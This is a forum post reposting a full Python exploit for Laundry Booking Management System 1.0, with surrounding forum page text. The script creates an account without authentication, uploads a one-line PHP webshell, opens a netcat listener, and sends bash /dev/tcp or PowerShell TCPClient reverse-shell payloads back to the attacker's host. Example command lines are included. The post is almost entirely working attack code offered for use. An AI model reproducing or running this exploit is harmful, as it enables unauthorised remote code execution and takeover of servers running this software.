Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Laundry Booking Management System 1.0 - Remote Code Execution (RCE)

 Share


Recommended Posts

# Exploit Title: Laundry Booking Management System 1.0 - Remote Code Execution (RCE)
# Date: 29/11/2021
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/laundry_sourcecode.zip
# Version: 1.0
# Tested on: Windows 7 and Ubuntu 21.10

# Vulnerability: Its possible create an user without being authenticated,
# in this request you can upload a simple webshell which will used to get a
# reverse shell

import re, sys, argparse, requests, time, os
import subprocess, pyfiglet

ascii_banner = pyfiglet.figlet_format("Laundry")
print(ascii_banner)
print("      Booking Management System\n")
print("----[Broken Access Control to RCE]----\n")


class Exploit:

    def __init__(self,target, shell_name,localhost,localport,os):

        self.target=target
        self.shell_name=shell_name
        self.localhost=localhost
        self.localport=localport
        self.LHL= '/'.join([localhost,localport])
        self.HPW= "'"+localhost+"'"+','+localport
        self.os=os
        self.session = requests.Session()
        #self.http_proxy  = "http://127.0.0.1:8080"
        #self.https_proxy = "https://127.0.0.1:8080"
        #self.proxies = {"http"  : self.http_proxy,
        #           "https" : self.https_proxy}

        self.headers= {'Cookie': 'PHPSESSID= Broken Access Control'}

    def create_user(self):

        url = self.target+"/pages/save_user.php"
        data = {
                "fname":"bypass",
                "email":"bypass@bypass.com",
                "password":"password",
                "group_id": "2",

            }

         #Creates user "bypass" and upload a simple webshell without authentication
        request = self.session.post(url,data=data,headers=self.headers,files={"image":(self.shell_name +'.php',"<?=`$_GET[cmd]`?>")})
        time.sleep(3)
        if (request.status_code == 200):
            print('[*] The user and webshell were created\n')
        else:
            print('Something was wront...!')

    def execute_shell(self):
        if self.os == "linux":
            time.sleep(3)
            print("[*] Starting reverse shell\n")
            subprocess.Popen(["nc","-nvlp", self.localport])
            time.sleep(3)

            #Use a payload in bash to get a reverse shell
            payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+self.LHL+'+0>%261"'
            execute_command = self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload

            try:
                request_rce = requests.get(execute_command)
                print(request_rce.text)

            except requests.exceptions.ReadTimeout:
                pass

        elif self.os == "windows":
            time.sleep(3)
            print("[*] Starting reverse shell\n")
            subprocess.Popen(["nc","-nvlp", self.localport])
            time.sleep(3)

            #Use a payload in powershell to get a reverse shell
            payload = """powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+self.HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0)
{%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""
            execute_command = self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload


            try:
                request_rce = requests.get(execute_command)
                print(request_rce.text)

            except requests.exceptions.ReadTimeout:
                pass

        else:
            print('Windows or linux')


def get_args():
    parser = argparse.ArgumentParser(description='Laundry Booking Management System')
    parser.add_argument('-t', '--target', dest="target", required=True,
action='store', help='Target url')
    parser.add_argument('-s', '--shell_name', dest="shell_name",
required=True, action='store', help='shell_name')
    parser.add_argument('-l', '--localhost', dest="localhost",
required=True, action='store', help='local host')
    parser.add_argument('-p', '--localport', dest="localport",
required=True, action='store', help='local port')
    parser.add_argument('-os', '--os', choices=['linux', 'windows'],
dest="os", required=True, action='store', help='linux,windows')
    args = parser.parse_args()
    return args

args = get_args()
target = args.target
shell_name = args.shell_name
localhost = args.localhost
localport = args.localport


xp = Exploit(target, shell_name,localhost,localport,args.os)
xp.create_user()
xp.execute_shell()

#Example software vulnerable installed in windows:python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os windows
#Example software vulnerable installed in linux: python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os linux
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...